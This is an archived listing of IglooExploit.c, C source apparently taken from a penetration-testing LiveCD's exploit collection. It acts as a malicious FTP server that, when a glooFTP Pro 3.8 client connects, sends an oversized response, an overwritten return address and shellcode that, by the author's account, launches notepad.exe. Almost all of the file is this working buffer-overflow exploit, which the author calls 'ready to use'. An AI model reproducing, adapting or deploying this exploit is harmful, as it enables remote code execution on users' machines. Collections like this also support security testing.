home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / iglooftp / IglooExloit.c < prev   
C/C++ Source or Header  |  2005-02-12  |  2KB  |  95 lines
  1. /* IglooExploit.c (Windows XP Professional Build 2600.x)
  2. *
  3. * vkhoshain@hotmail.com
  4. * ---------------------------
  5. * glooFTP Pro 3.8 Remote exploit code is ready to use ;)
  6. * all you need to do is compile the source code and then
  7. * run the program and wait for glooFTP Pro 3.8 connection
  8. *
  9. * This one doesn't do anything , just run notepad.exe and then crash
  10. * the program by :
  11. * INT 3 ;)
  12. *
  13. */  
  14.  
  15. #include "winsock2.h"
  16. #include "stdio.h"
  17. #pragma comment (lib,"ws2_32")
  18.  
  19. int main()
  20. {
  21.  
  22.         char spend[1024];
  23.         char shellcode[] =
  24.         "\x90\x90\x90\x90\x90\xEB\x13\x5F\x66\x31\xC0\x88\x47"
  25.                                         "\x0E\x40\x50\x57\xB8\xC6\x84\xE6\x77\xFF\xD0\xCD\x03"
  26.                                     "\xE8\xE8\xFF\xFF\xFF\x6E\x6F\x74\x65\x70\x61\x64\x20"    
  27.                                                 "\x20\x20\x20\x20\x20\x20\x23";           
  28.         WSADATA wsaData;                                                       
  29.         int s1,spt;
  30.         struct sockaddr_in p;
  31.         struct sockaddr_in emp;
  32.         int len;
  33. // Startup ...
  34.         WSAStartup(0x0101,&wsaData);
  35.  
  36.  
  37. // Creating first socket!
  38. printf("Creating socket ...\n");
  39.         if ((s1=socket(AF_INET,SOCK_STREAM,0))==-1){
  40.                 printf("Err in Creating socket\n");
  41.                 closesocket(s1);
  42.                 return 0;
  43.         }
  44.         p.sin_port = htons(21);
  45.         p.sin_family =AF_INET; 
  46.         p.sin_addr.s_addr = INADDR_ANY;
  47.  
  48.  
  49.  
  50. // Binding ---
  51. printf("Binding ...\n");
  52.         if ((bind(s1,(struct sockaddr*) &p,sizeof(p)))==-1)
  53.         {
  54.                 printf("Err in Bind ...\n");
  55.                 closesocket(s1);
  56.                 return 0;
  57.         }
  58.  
  59. printf("going to start listening\n");
  60. if ((listen(s1,5))==-1)
  61. {
  62.         printf("Err in liten method ..\n");
  63.         closesocket(s1);
  64.         return 0;
  65. }
  66.  
  67. len=sizeof(emp);
  68.  
  69. // ACCEPTING
  70. printf("Listening on port 21 , please wait for glooFTP(ver3.8) connection
  71. ...\n");
  72. spt=accept(s1,&emp,&len);
  73. printf("The ftp client has just connected ,please wait ...\n");
  74.  
  75. send(spt,"200 ",4,0);                      // Sending "200 "
  76.  
  77.  
  78. send(spt,spend,1024,0);                         //to recive RET addr place
  79.  
  80.  
  81. send(spt,"\x79\xfc\xe9\x77",4,0);         //EIP Address (RET Addr)
  82.  
  83.  
  84. send(spt,shellcode,46,0);                 //Sending Shellcode
  85.  
  86. send(spt,"\n",1,0);
  87.  
  88. closesocket(s1);
  89. closesocket(spt);
  90. printf("Shellcode has just sent , Done.\n");
  91.  
  92. return 0;
  93.  
  94. }
  95.